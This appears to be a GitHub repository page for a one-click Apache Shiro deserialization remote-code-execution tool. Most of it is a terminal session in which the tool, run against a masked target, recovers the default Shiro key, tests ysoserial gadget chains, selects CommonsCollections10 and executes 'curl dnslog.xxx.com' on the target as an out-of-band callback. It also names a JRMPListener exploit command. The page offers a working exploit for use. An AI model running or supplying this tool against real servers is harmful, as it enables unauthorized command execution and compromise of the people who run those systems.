[admin@ shiro]java -cp shiro_tool.jar Shiro https://xx.xx.xx.xx/
[-] target: https://xx.xx.xx.xx/
[-] target is use shiro
[-] start guess shiro key.
[-] shiro key: kPH+bIxk5D2deZiIxcaaaA==
[-] check URLDNS
[*] find: URLDNS can be use
[*] URLDNS command format: http://dnslog.xxx.com
[-] check CommonsBeanutils1
[-] check CommonsCollections1
[-] check CommonsCollections2
[-] check CommonsCollections3
[-] check CommonsCollections4
[-] check CommonsCollections5
[-] check CommonsCollections6
[-] check CommonsCollections7
[-] check CommonsCollections8
[-] check CommonsCollections9
[-] check CommonsCollections10
[*] find: CommonsCollections10 can be use
[-] check Groovy1
[-] check JSON1
[-] check Spring1
[-] check Spring2
[-] check JRMPClient
[*] find: JRMPClient can be use
[*] JRMPClient please use: java -cp shiro_tool.jar ysoserial.exploit.JRMPListener
0: URLDNS
1: CommonsCollections10
2: JRMPClient
[-] please enter the number(0-2)
1
[-] use gadget: CommonsCollections10
[-] please enter command, input q or quit to quit
curl dnslog.xxx.com
[-] start process command: curl dnslog.xxx.com
[-] please enter command, input q or quit to quit
quit
[-] start process command: quit
[-] exit
forked from wyzxxz/shiro_rce_tool
-
Notifications
You must be signed in to change notification settings - Fork 1
Hacker-One/shiro_rce
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
About
shiro rce 反序列 命令执行 一键工具
Topics
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published